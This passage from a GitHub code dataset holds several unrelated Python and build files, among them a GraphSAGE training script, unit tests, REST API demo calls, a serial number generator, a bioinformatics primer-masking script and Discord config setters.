PickerFactory()\r\n print(pf)\r\n rp = pf.CreatePicker(\"RandomPicker\", **d)\r\n print(rp)\r\n rp.Pick(None)\r\n for draw in rp.GetPicks():\r\n print(draw)","repo_name":"Dreamcatcher5/Powerball","sub_path":"src/picker/pickerTest.py","file_name":"pickerTest.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17054205322","text":"from unittest import TestCase\nfrom cmake_row import cmake_row, row_type\n\nclass test_cmake_row(TestCase):\n commentline = \"\"\n filepath_var_valid = \"CMAKE_ADDR2LINE:FILEPATH=/usr/bin/addr2line\"\n noname_var = \":FILEPATH=/usr/bin/addr2line\"\n notype_var = \"CMAKE_ADDR2LINE:=/usr/bin/addr2line\"\n bool_var = \"CMAKE_ADDR2LINE:BOOL=ON\"\n\n def test_row_creation(self):\n var_name = \"CMAKE_ADDR2LINE\"\n row = cmake_row(self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.name, var_name)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.VARIABLE)\n with self.subTest():\n self.assertEqual(row.get_val(), \"/usr/bin/addr2line\")\n with self.subTest():\n self.assertEqual(row.row_number, 0)\n\n def test_slash_comment_row(self):\n row = cmake_row(\"//\" + self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.SLASH_COMMENT)\n with self.subTest():\n self.assertEqual(row.serialize(), \"//\" + self.filepath_var_valid)\n\n def test_pound_comment_row(self):\n row = cmake_row(\"#\" + self.filepath_var_valid, 0)\n with self.subTest():\n self.assertEqual(row.row_type, row_type.POUND_COMMENT)\n with self.subTest():\n self.assertEqual(row.serialize(), \"#\" + self.filepath_var_valid)\n\n def test_noname_row(self):\n self.assertRaises(ValueError, cmake_row, self.noname_var, 0)\n\n def test_empty_line(self):\n row = cmake_row(\"\", 0)\n self.assertEqual(row.row_type, row_type.EMPTY)\n\n def test_notype_row(self):\n self.assertRaises(ValueError, cmake_row, self.notype_var, 0)\n\n def test_bool_row(self):\n \"\"\"\n we use assertEqual instead of assertTrue to avoid false positives with\n casting any other value to bool.\n \"\"\"\n row = cmake_row(self.bool_var, 0)\n with self.subTest():\n self.assertEqual(row.val.value, True)\n with self.subTest():\n self.assertEqual(row.serialize(), self.bool_var)\n\n def test_emtpy_row(self):\n row = cmake_row(\"\", 0)\n self.assertEqual(\"\", row.serialize())\n","repo_name":"vvaltchev/tilck","sub_path":"scripts/configurator/parser/test_cmakerow.py","file_name":"test_cmakerow.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":2169,"dataset":"github-code","pt":"34"} +{"seq_id":"43890944500","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torch.autograd import Variable\n\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nfrom collections import defaultdict\n\nfrom encoders import Encoder\nfrom aggregators import MeanAggregator\n\"\"\"\nSimple supervised GraphSAGE model as well as examples running the model\non the Cora and Pubmed datasets.\n\"\"\"\nimport os\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n# torch.cuda.set_device(0)\n\nclass SupervisedGraphSage(nn.Module):\n def __init__(self, num_classes, enc):\n super(SupervisedGraphSage, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n 
init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze())\n\n\nclass UnsupervisedGraphSage(nn.Module):\n def __init__(self, num_classes, enc):\n super(UnsupervisedGraphSage, self).__init__()\n self.enc = enc\n # self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, num_neg=5):\n scores = self.enc(nodes)\n pos_sample = self.enc.pos_sample(nodes)\n pos_embed = self.enc(pos_sample)\n\n neg_sample = self.enc.neg_sample(nodes, num_neg)\n neg_embed = [self.enc(neg_sample[i]) for i in range(num_neg)]\n\n loss_pos = torch.diag(-torch.log(torch.sigmoid(scores.t().mm(pos_embed))))\n\n loss_neg = sum([torch.diag(-torch.log(torch.sigmoid(-scores.t().mm(neg_embed[i])))) for i in range(num_neg)]) / len(nodes)\n # print(loss_pos.shape, loss_pos.mean().item(), loss_neg.shape, loss_neg.mean().item())\n loss_batch = torch.mean(loss_pos + loss_neg)\n return loss_batch\n\n\nclass UnsupervisedGraphSageCls(nn.Module):\n def __init__(self, num_classes, enc):\n super(UnsupervisedGraphSageCls, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n self.weight = nn.Parameter(\n torch.FloatTensor(num_classes, enc.embed_dim))\n init.xavier_uniform(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds)\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze()), scores\n\n\ndef load_cora():\n num_nodes = 2708\n num_feats = 1433\n feat_data = np.zeros((num_nodes, num_feats))\n labels = np.empty((num_nodes, 1), dtype=np.int64)\n node_map = {}\n label_map = {}\n with open(\"../cora/cora.content\") as fp:\n for i, line in enumerate(fp):\n info = line.strip().split()\n #feat_data[i,:] = map(float, info[1:-1])\n feat_data[i, :] = [float(x) for x in info[1:-1]]\n\n node_map[info[0]] = i\n if not info[-1] in label_map:\n label_map[info[-1]] = len(label_map)\n labels[i] = label_map[info[-1]]\n\n adj_lists = defaultdict(set)\n with open(\"../cora/cora.cites\") as fp:\n for i, line in enumerate(fp):\n info = line.strip().split()\n paper1 = node_map[info[0]]\n paper2 = node_map[info[1]]\n adj_lists[paper1].add(paper2)\n adj_lists[paper2].add(paper1)\n return feat_data, labels, adj_lists\n\n\ndef un_cora(model_d=128, cuda=False):\n np.random.seed(233)\n random.seed(233)\n num_nodes = 2708\n feat_data, labels, adj_lists = load_cora()\n features = nn.Embedding(2708, 1433)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n if cuda:\n features.cuda()\n\n agg1 = MeanAggregator(features, cuda=cuda)\n enc1 = Encoder(features, 1433, model_d, adj_lists, agg1, gcn=False, cuda=cuda)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=cuda)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=False,\n cuda=cuda)\n enc1.num_samples = 5\n enc2.num_samples = 5\n\n graphsage = UnsupervisedGraphSage(7, enc2)\n if cuda:\n graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n test_size = 1000\n train_size = num_nodes\n val = 
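`UnsupervisedGraphSage.loss` above implements the standard GraphSAGE objective: for each node `u` with positive sample `v` and negatives `v_1..v_Q`, minimise `-log σ(z_u·z_v) - Σ_i log σ(-z_u·z_{v_i})`. A compact restatement that avoids the `diag(Zᵀ Z_pos)` trick — the diagonal of that matmul is just an element-wise product summed over the feature axis — is sketched below; it sums negatives per node and averages over the batch, a common variant of the normalisation the record uses. (Incidentally, `init.xavier_uniform` is deprecated in modern PyTorch in favour of the in-place `init.xavier_uniform_`.)

```python
import torch
import torch.nn.functional as F

def graphsage_unsup_loss(z, z_pos, z_negs):
    """z, z_pos: (d, b) column embeddings; z_negs: list of (d, b) negatives."""
    # logsigmoid is numerically safer than log(sigmoid(...))
    pos = -F.logsigmoid((z * z_pos).sum(dim=0))                      # (b,)
    neg = sum(-F.logsigmoid(-(z * zn).sum(dim=0)) for zn in z_negs)  # (b,)
    return (pos + neg).mean()

d, b = 8, 5
loss = graphsage_unsup_loss(torch.randn(d, b), torch.randn(d, b),
                            [torch.randn(d, b) for _ in range(3)])
```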
rand_indices[:test_size]\n train = list(rand_indices[test_size:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.05)\n times = []\n\n epoch_num = 20\n batch_size = 512\n for batch in range(epoch_num * int(train_size / batch_size)):\n # batch_size\n\n batch_nodes = train[:batch_size]\n # shuffle:random list on itself return none\n random.shuffle(train)\n \n start_time = time.time()\n # set all gradient to be 0\n optimizer.zero_grad()\n # loss 包含 forward\n loss = graphsage.loss(\n batch_nodes)\n\n loss.backward()\n # refresh params' gradient\n optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n print('[%f / %d]' % (float(batch / int(train_size / batch_size)), epoch_num), 'batch:', batch, 'loss:', loss.item())\n\n print('############ Training Classification ##########')\n cls_model = UnsupervisedGraphSageCls(7, enc2)\n cls_optimizer = torch.optim.Adam([cls_model.weight], lr=0.005)\n cls_epoch_num = 200\n for batch in range(cls_epoch_num * int(train_size / batch_size)):\n # batch_size\n batch_nodes = train[:batch_size]\n # shuffle:random list on itself return none\n random.shuffle(train)\n start_time = time.time()\n # set all gradient to be 0\n cls_optimizer.zero_grad()\n # loss 包含 forward\n loss, scores = cls_model.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n\n loss.backward()\n # refresh params' gradient\n cls_optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n if batch % 10 == 0:\n print('[%f / %d]' % (float(batch / int(train_size / batch_size)), cls_epoch_num), 'batch:', batch,\n 'loss:', loss.item())\n val_output = cls_model.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n\n val_output = cls_model.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n print(\"Average batch time:\", np.mean(times))\n 1\n return f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\")\n\n\ndef run_cora():\n np.random.seed(233)\n random.seed(233)\n num_nodes = 2708\n feat_data, labels, adj_lists = load_cora()\n features = nn.Embedding(2708, 1433)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n # features.cuda()\n\n agg1 = MeanAggregator(features, cuda=False)\n enc1 = Encoder(features, 1433, 128, adj_lists, agg1, gcn=False, cuda=False)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=False)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=False,\n cuda=False)\n enc1.num_samples = 5\n enc2.num_samples = 5\n\n graphsage = SupervisedGraphSage(7, enc2)\n ungraphsage = UnsupervisedGraphSage(7, enc2)\n # graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n val = rand_indices[:1000]\n train = list(rand_indices[1000:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.7)\n times = []\n for batch in range(200):\n # batch_size\n batch_nodes = train[:256]\n # shuffle:random list on itself return none\n random.shuffle(train)\n start_time = time.time()\n # set all gradient to be 0\n optimizer.zero_grad()\n # loss 包含 forward\n loss = graphsage.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n\n if batch % 20 == 0:\n loss2 = 
ungraphsage.loss(batch_nodes)\n print('[{}/{}] Training: cls loss = {}; uns loss = {}'.format(batch, 200, loss, loss2))\n\n loss.backward()\n # refresh params' gradient\n optimizer.step()\n\n end_time = time.time()\n times.append(end_time - start_time)\n # print(batch, loss.item())\n\n val_output = graphsage.forward(val)\n print(\n \"Validation F1:\",\n f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\"))\n print(\"Average batch time:\", np.mean(times))\n 1\n return f1_score(labels[val],\n val_output.data.numpy().argmax(axis=1),\n average=\"micro\")\n\n\ndef load_pubmed():\n #hardcoded for simplicity...\n num_nodes = 19717\n num_feats = 500\n feat_data = np.zeros((num_nodes, num_feats))\n labels = np.empty((num_nodes, 1), dtype=np.int64)\n node_map = {}\n with open(\"../pubmed-data/Pubmed-Diabetes.NODE.paper.tab\") as fp:\n fp.readline()\n feat_map = {\n entry.split(\":\")[1]: i - 1\n for i, entry in enumerate(fp.readline().split(\"\\t\"))\n }\n for i, line in enumerate(fp):\n info = line.split(\"\\t\")\n node_map[info[0]] = i\n labels[i] = int(info[1].split(\"=\")[1]) - 1\n for word_info in info[2:-1]:\n word_info = word_info.split(\"=\")\n feat_data[i][feat_map[word_info[0]]] = float(word_info[1])\n adj_lists = defaultdict(set)\n with open(\"../pubmed-data/Pubmed-Diabetes.DIRECTED.cites.tab\") as fp:\n fp.readline()\n fp.readline()\n for line in fp:\n info = line.strip().split(\"\\t\")\n paper1 = node_map[info[1].split(\":\")[1]]\n paper2 = node_map[info[-1].split(\":\")[1]]\n adj_lists[paper1].add(paper2)\n adj_lists[paper2].add(paper1)\n return feat_data, labels, adj_lists\n\n\ndef run_pubmed():\n np.random.seed(233)\n random.seed(233)\n num_nodes = 19717\n feat_data, labels, adj_lists = load_pubmed()\n features = nn.Embedding(19717, 500)\n features.weight = nn.Parameter(torch.FloatTensor(feat_data),\n requires_grad=False)\n # features.cuda()\n\n agg1 = MeanAggregator(features, cuda=True)\n enc1 = Encoder(features, 500, 128, adj_lists, agg1, gcn=True, cuda=False)\n agg2 = MeanAggregator(lambda nodes: enc1(nodes).t(), cuda=False)\n enc2 = Encoder(lambda nodes: enc1(nodes).t(),\n enc1.embed_dim,\n 128,\n adj_lists,\n agg2,\n base_model=enc1,\n gcn=True,\n cuda=False)\n enc1.num_samples = 10\n enc2.num_samples = 25\n\n graphsage = SupervisedGraphSage(3, enc2)\n # graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n # test = rand_indices[:1000]\n val = rand_indices[:4000]\n train = list(rand_indices[4000:])\n\n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad,\n graphsage.parameters()),\n lr=0.7)\n times = []\n for batch in range(200):\n batch_nodes = train[:1024]\n random.shuffle(train)\n start_time = time.time()\n optimizer.zero_grad()\n loss = graphsage.loss(\n batch_nodes,\n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n loss.backward()\n optimizer.step()\n end_time = time.time()\n times.append(end_time - start_time)\n # print(batch, loss.item())\n\n val_output = graphsage.forward(val)\n # print(\n # \"Validation F1:\",\n # f1_score(labels[val],\n # val_output.data.numpy().argmax(axis=1),\n # average=\"micro\"))\n # print(\"Average batch time:\", np.mean(times))\n\n\nif __name__ == \"__main__\":\n un_cora()\n # run_cora()\n # f, a = 0, 0\n # for i in range(10):\n # ret = run_cora()\n # # f = max(f, ret[0])\n # # a = max(a, ret[1])\n # print(i, ret)\n # print(f, 
a)\n","repo_name":"wizardxxx7/graphsage_unsupervise","sub_path":"graphsage/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12700819613","text":"# Projekt: Seriennummergenerator \\ Modul: serialnumbergenerator\n# Author: Ali Abas Arsalahn\n# Datum: 12.03.2022\n\"\"\"Serialnumbergenerator module\"\"\"\n\nfrom io import UnsupportedOperation\nfrom random import randrange\nfrom string import ascii_letters, digits\nimport json\n\n\nclass SerialnumberGenerator():\n \"\"\"Methods: generate_serialnumber, save_serialnumber, validate_serialnumber.\"\"\"\n\n def __init__(self) -> None:\n self.sn_map = {\"keys\": {}}\n\n def generate_serialnumber(self, sn_type: str, count: int, key_rows: int, row_length: int) -> None:\n \"\"\"Generates a Serialnumber based on type.\n Takes quantity, rows and row_length as Argmuments\"\"\"\n\n def generate_letter() -> str:\n \"\"\"returns a random letter.\"\"\"\n rnd_nmb = randrange(len(ascii_letters) - 1)\n return ascii_letters[rnd_nmb]\n\n def generate_digit() -> str:\n \"\"\"returns a random digit.\"\"\"\n rnd_nmb = randrange((len(digits)) - 1)\n return digits[rnd_nmb]\n\n def generate_string(sn_type: str, count: int, rows: int, row_length: int, tmp_list: list) -> list:\n \"\"\"\n Generates Serialnumbers based on type.\n Returns created serialnumbers as item in a list.\n \"\"\"\n key = ''\n for i in range(rows * row_length):\n key += generate_letter() if sn_type == 'letter' else generate_digit()\n\n tmp_list.append(key)\n if count <= 1:\n return tmp_list\n else:\n return generate_string(sn_type, (count - 1), rows, row_length, tmp_list)\n\n tmp_list = []\n end_list = generate_string(\n sn_type, count, key_rows, row_length, tmp_list)\n for key in end_list:\n self.sn_map[\"keys\"][key] = True\n\n def validate_serialnumber(self, validate_serialnumber: str, directory: str, load_filename: str) -> None:\n \"\"\"Takes a string as an argument and checks if it is valid a valid serialnumber.\"\"\"\n with open(directory + f\"/{load_filename}\", 'r', encoding=\"utf_8\") as file:\n data = json.load(file)\n try:\n if data[\"keys\"][validate_serialnumber]:\n print(\"key is valid!\")\n else:\n print(\"key is not valid\")\n except KeyError:\n print(\"key not found!\")\n\n def save_serialnumber(self, save_directory: str, save_filename: str) -> None:\n \"\"\"writes existing keys to a json file.\"\"\"\n try:\n with open(save_directory + f\"/{save_filename}\", \"r\", encoding=\"utf-8\") as file:\n data = json.load(file)\n for serialnumber in self.sn_map[\"keys\"]:\n data[\"keys\"][serialnumber] = True\n with open((save_directory + f\"/{save_filename}\"), \"r+\", encoding=\"utf-8\") as file:\n json.dump(data, file, indent=4)\n except (UnsupportedOperation, FileNotFoundError, json.decoder.JSONDecodeError):\n with open((save_directory + f\"/{save_filename}\"), \"w\", encoding=\"utf-8\") as file:\n json.dump(self.sn_map, file, indent=4)\n","repo_name":"JoshuaSchumacherGER/Python_Loesungen","sub_path":"P1/1/serialnumbergenerator.py","file_name":"serialnumbergenerator.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"22889342470","text":"from building import *\nimport rtconfig\n\ncwd = GetCurrentDir()\nsrc = Glob('*.c')\nCPPPATH = [cwd]\nLOCAL_CCFLAGS = ''\n\nif GetDepend(['GPS_RMC_USING_SAMPLE']):\n src += Glob('example/rtt_gps_rmc_example.c')\n\ngroup = 
DefineGroup('gps_rmc', src, depend = ['PKG_USING_GPS_RMC'], CPPPATH = CPPPATH, LOCAL_CCFLAGS = LOCAL_CCFLAGS)\n\nReturn('group')\n","repo_name":"maplerian/gps_rmc","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"81045068","text":"from actor import Actor\nfrom base import Session\nfrom movie import Movie\nfrom QueryConverter import converter\n\nfrom datetime import date\n\n# 2 - extract a session\nsession = Session()\n\n# 3 - extract all movies\nmovies = session.query(Movie).all()\nmv = converter()._convert_movie(movies)\nimport pdb;pdb.set_trace()\n\n# u need to convert this data to schema type.\n# 4 - print movies' details\nprint('\\n### All movies:')\nfor movie in movies:\n print(f'{movie.title} was released on {movie.release_date}')\nprint('')\n\n# 6 - movies that Dwayne Johnson participated\nthe_rock_movies = session.query(Movie) \\\n .join(Actor, Movie.actors) \\\n .filter(Actor.name == 'Dwayne Johnson') \\\n .all()\n\nprint('### Dwayne Johnson movies:')\nfor movie in the_rock_movies:\n print(f'The Rock starred in {movie.title}')\nprint('')","repo_name":"ZahraHR/API-mini-ptoject","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4758139999","text":"import requests\n\nbase_url = \"https://petstore.swagger.io/v2\"\n\nheaders = {\n \"accept\": \"application/json\"\n}\n\ndata = {\n \"petId\": 6,\n \"additionalMetadata\": \"Some metadata\"\n}\n\n\n# GET запрос\ndef get_request():\n url = f\"{base_url}/pet/findByStatus\"\n response = requests.get(url, headers=headers)\n return response\n\n# POST запрос\ndef post_request(data):\n url = f\"{base_url}/pet\"\n response = requests.post(url, json=data, headers=headers)\n return response\n\n# PUT запрос\ndef put_request(pet_id, data):\n url = f\"{base_url}/pet\"\n response = requests.put(url, json=data, headers=headers)\n return response\n\n# DELETE запрос\ndef delete_request(pet_id):\n url = f\"{base_url}/pet/{pet_id}\"\n response = requests.delete(url, headers=headers)\n return response\n\n# Выполнение запросов и печать ответов\nif __name__ == \"__main__\":\n # Выполнение GET запроса\n get_response = get_request()\n print(\"GET Response:\")\n print(get_response.status_code)\n print(get_response.json())\n print()\n\n # Выполнение POST запроса\n new_pet_data = {\n \"name\": \"Fluffy\",\n \"type\": \"Cat\"\n }\n post_response = post_request(new_pet_data)\n print(\"POST Response:\")\n print(post_response.status_code)\n print(post_response.json())\n print()\n\n # Получение ID нового питомца из POST-ответа\n new_pet_id = post_response.json()[\"id\"]\n\n # Выполнение PUT запроса\n updated_pet_data = {\n \"name\": \"Whiskers\",\n \"type\": \"Cat\"\n }\n put_response = put_request(new_pet_id, updated_pet_data)\n print(\"PUT Response:\")\n print(put_response.status_code)\n print(put_response.json())\n print()\n\n # Выполнение DELETE запроса\n delete_response = delete_request(new_pet_id)\n print(\"DELETE Response:\")\n print(delete_response.status_code)\n print(delete_response.text)\n","repo_name":"Djonsis/Module_19_library_requests_19.3.3","sub_path":"request_API.py","file_name":"request_API.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 
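The petstore script in the record above issues bare `requests` calls with no timeout or status handling, and its GET to `/pet/findByStatus` omits the `status` query parameter the endpoint expects. A hedged, hardened variant of the same calls — `base_url` and `headers` reuse the script's values:

```python
import requests

base_url = "https://petstore.swagger.io/v2"
headers = {"accept": "application/json"}

def safe_request(method, url, **kwargs):
    # Fail fast on hangs and surface non-2xx responses as exceptions.
    kwargs.setdefault("timeout", 10)
    response = requests.request(method, url, **kwargs)
    response.raise_for_status()
    return response

resp = safe_request("get", f"{base_url}/pet/findByStatus",
                    params={"status": "available"}, headers=headers)
print(resp.status_code)
```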
+{"seq_id":"69975314019","text":"#! /usr/bin/python3\n\nimport pickle\nimport json\nimport os\n\nfrom collections import Counter\n\nimport utils\nimport corpse\n\ndef load_cl(classifier): #load the classifier from a saved file\n f=open(classifier, \"rb\")\n return(pickle.load(f))\n\ndef score_cdb(tfile, cats, keywords, cl):\n cdb=utils.open_cdb(tfile)\n score, uscore={}, {}\n for key in utils.get_all_keys(cdb):\n if key.endswith(\"desc\"):\n cati=check_categories(cl, cats, json.loads(str(cdb[bytes(key, 'utf-8')], 'utf-8')))\n keywi=check_keywords(keywords, str(cdb[bytes(key, 'utf-8')], 'utf-8'))\n value=int(cati)+keywi\n score[cdb[bytes(key[:-4]+\"url\", 'utf-8')]]=value\n print(\"VAL:\", cati, keywi)\n return(score)\n\ndef ready_directory(directory):\n for place in utils.recursive_scan(\"dict.cdb\", [directory]):\n if place.startswith(\"allwords\"):\n allwords=utils.cdb2dict(place)\n corpse.neo_process_dir(directory, confdir)\n\ndef check_keywords(keywords, descr):\n score=0\n descr=json.loads(descr)\n for word in descr:\n if descr[word] > 1:\n if word in keywords:\n score=score+descr[word]\n return(score)\n\ndef check_categories(cl, cats, descr):\n cat=cl.classify(descr)\n print(cat)\n if str(cat, 'utf-8') in cats:\n print(cats[str(cat, 'utf-8')])\n return(cats[str(cat, 'utf-8')])\n return(0)\n\ndef isopeda(directory, condir):\n score={}\n best=[]\n global allwords\n global confdir\n confdir=condir\n if os.path.isdir(directory) is False:\n os.makedirs(directory)\n cats=load_json(confdir+\"/\"+\"cats.dict\")\n allwords=utils.cdb2dict(confdir+\"/\"+\"allwords.dict.cdb\")\n keywords=load_json(confdir+\"/\"+\"keywords.list\")\n cl=load_cl(confdir+\"/\"+\"classi.class\") \n ready_directory(directory)\n places=utils.recursive_scan(\"desc.cdb\", [directory])\n for place in places:\n score.update(score_cdb(place, cats, keywords, cl))\n print(score)\n\n leaderboard=Counter(score)\n print(leaderboard.most_common(5))\n \ndef load_json(tfile):\n with open(tfile, \"r\") as source:\n return(json.load(source))\n","repo_name":"anneselmo/Isopeda","sub_path":"isopeda.py","file_name":"isopeda.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20882661741","text":"#!/usr/local/bin/python3.5\nimport sys, os\nimport pandas as pd\nfrom scipy.stats import fisher_exact as fe\nfrom statsmodels.sandbox.stats.multicomp import multipletests\n\nprefix = sys.argv[1]\nfreq = float(sys.argv[2])\ndf_bed_paths = sys.argv[3:]\ndf_paths = df_bed_paths[0::2]\nbed_paths = df_bed_paths[1::2]\n\nout_paths = []\nfor i in range(len(df_paths)):\n _ = os.path.basename(df_paths[i])\n _ = _.split(\".\")[0]\n out_paths.append(_)\n\nbeds = []\nfor i in bed_paths:\n beds.append(pd.read_table(i, sep=\"\\t\", names=[\"Region\", \"Start\", \"End\", \"Name\", \"Score\", \"Strand\"]))\n\nvdfs = []\nfor _i,i in enumerate(df_paths):\n _ = pd.read_table(i, names=[\"POS\", \"REF\", \"ALT\", \"AD\", \"REV\", \"DP\", \"QUAL\"], skiprows = 1)\n vdfs.append(_)\n\n# Fisher's Exact Test\n# | AD | DP |\n# Variant | | |\n# Threshold | 3 | 100 |\nfor vdf in vdfs:\n pvals = vdf.apply(lambda x: fe([[x[\"AD\"], x[\"DP\"]], [(freq/100)*x[\"DP\"], x[\"DP\"]]], \"greater\"), axis = 1)\n vdf[\"threshold_\"+str(freq)+\"%_pval\"] = multipletests([i[1] for i in pvals], method=\"fdr_bh\")[1]\n vdf[\"threshold_\"+str(freq)+\"%_oddsratio\"] = [i[0] for i in pvals]\n\nthreshold = freq\ncol = \"threshold_\"+str(threshold)+\"%\"\npval_threshold = 0.05\n_ = vdfs\n# _ 
= [i[i[col+\"_pval\"]<=pval_threshold] for i in _]\ndf = _[0]\nfor _i, i in enumerate(_[1:]):\n df = df.merge(i, how='inner', on=['POS', 'REF', 'ALT'], suffixes = (\"_0\", \"_\"+str(_i+1)))\n\ncols = df.columns[df.columns.str.match(r\"\\b\"+col+\"\\b*_pval\")]\ndf = df.ix[df[cols].apply(lambda x: any([i<= pval_threshold for i in x]), axis = 1)]\n\nmasked = []\nfor i in range(len(beds)):\n masked.append([])\n\nfor i in df[\"POS\"]:\n for j in range(len(beds)):\n bed = beds[j]\n _ = bed[(bed[\"Start\"] <= i) & (bed[\"End\"] >= i)]\n if _.shape[0] == 1:\n _n = \"_\".join(_[\"Name\"].values[0].split(\"_\")[:-1])\n _ = bed[bed[\"Name\"].str.contains(_n)].sort_values(\"Start\")\n masked[j].extend(_.index.values) # Two primers per amplicon\n\nfor i in range(len(masked)):\n masked[i] = set(masked[i])\n\nfor i in range(len(out_paths)):\n txt = \" \".join([str(j) for j in masked[i]])\n print(txt)\n with open(prefix+out_paths[i]+'_masked_primer_indices.txt', 'w') as f:\n f.write(txt+'\\n')\n","repo_name":"grubaughlab/ivar","sub_path":"scripts/get_masked_amplicons.py","file_name":"get_masked_amplicons.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"15415008005","text":"import csv\nimport os\n\n\nglobal DISCORDCONFIGFILE\nDISCORDCONFIGFILE = 'DISCORDCONFIG.csv'\ndirectory = os.path.dirname(__file__)\nconfigFilepath = os.path.join(directory, DISCORDCONFIGFILE)\n\nglobal TOKENSFILE \nTOKENSFILE = 'TOKENS.csv'\ndirectory = os.path.dirname(__file__)\ntokenFilepath = os.path.join(directory, TOKENSFILE)\n\ndef setRegistrationChannelID():\n \n ID = input('Please enter the channel ID for registering new users: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'registration':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setSoloChannelID():\n \n ID = input('Please enter the channel ID for reporting solo PUBG rounds: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'soloReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setDuoChannelID():\n \n ID = input('Please enter the channel ID for reporting duo PUBG rounds: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'duoReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setSquadChannelID():\n \n ID = input('Please enter the channel ID for reporting squad PUBG rounds: ')\n with open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'squadReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setPUBGToken():\n \n ID = input('Please enter the developer API TOKEN for PUBG: ')\n with open(tokenFilepath, 'r') as 